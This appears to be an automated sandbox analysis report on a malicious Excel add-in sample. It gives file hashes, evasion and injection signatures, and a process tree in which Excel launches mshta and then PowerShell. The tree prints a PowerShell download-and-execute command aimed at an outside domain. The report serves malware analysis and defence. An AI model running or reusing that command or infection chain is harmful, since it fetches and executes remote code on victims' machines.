Analysis
-
max time kernel
145s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 18:07
Static task
static1
Behavioral task
behavioral1
Sample
0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea.xll
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea.xll
Resource
win11-20240426-en
General
-
Target
0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea.xll
-
Size
12KB
-
MD5
18e176921ed58908b20b7b23037ecd03
-
SHA1
24e785ac4c6e96954e70451c02aa35d2b474c648
-
SHA256
0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea
-
SHA512
d02312253453fba1139f669fc8d8a059a43177ff609d19b34882dbdc656966c40caa1f1fda829525f21153e39ab2cd280114321bd1efe3b30d867da996e72ef5
-
SSDEEP
192:fL29RBzDzeobchBj8JONUONhru8rEPEjr7Ahv:z29jnbcvYJOBju8vr7Cv
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4156 3052 mshta.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 36 2820 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 2 IoCs
Processes:
EXCEL.EXEpid process 3052 EXCEL.EXE 3052 EXCEL.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3052 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2820 powershell.exe 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2820 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 3052 EXCEL.EXE 3052 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
EXCEL.EXEpid process 3052 EXCEL.EXE 3052 EXCEL.EXE 3052 EXCEL.EXE 3052 EXCEL.EXE 3052 EXCEL.EXE 3052 EXCEL.EXE 3052 EXCEL.EXE 3052 EXCEL.EXE 3052 EXCEL.EXE 3052 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEmshta.exedescription pid process target process PID 3052 wrote to memory of 4156 3052 EXCEL.EXE mshta.exe PID 3052 wrote to memory of 4156 3052 EXCEL.EXE mshta.exe PID 3052 wrote to memory of 4156 3052 EXCEL.EXE mshta.exe PID 4156 wrote to memory of 2820 4156 mshta.exe powershell.exe PID 4156 wrote to memory of 2820 4156 mshta.exe powershell.exe PID 4156 wrote to memory of 2820 4156 mshta.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f754844cfb65838d1dd6b19dde5d835c
SHA1b3eb677783adc88c8d048898449e04d49f416db6
SHA2563644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6
SHA512f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf
-
C:\Users\Admin\AppData\Local\Temp\0c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea.xll
Filesize12KB
MD518e176921ed58908b20b7b23037ecd03
SHA124e785ac4c6e96954e70451c02aa35d2b474c648
SHA2560c2cc61e4e82d791a3616cf664de1d1e03a937a2473079dd49ae146959b715ea
SHA512d02312253453fba1139f669fc8d8a059a43177ff609d19b34882dbdc656966c40caa1f1fda829525f21153e39ab2cd280114321bd1efe3b30d867da996e72ef5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82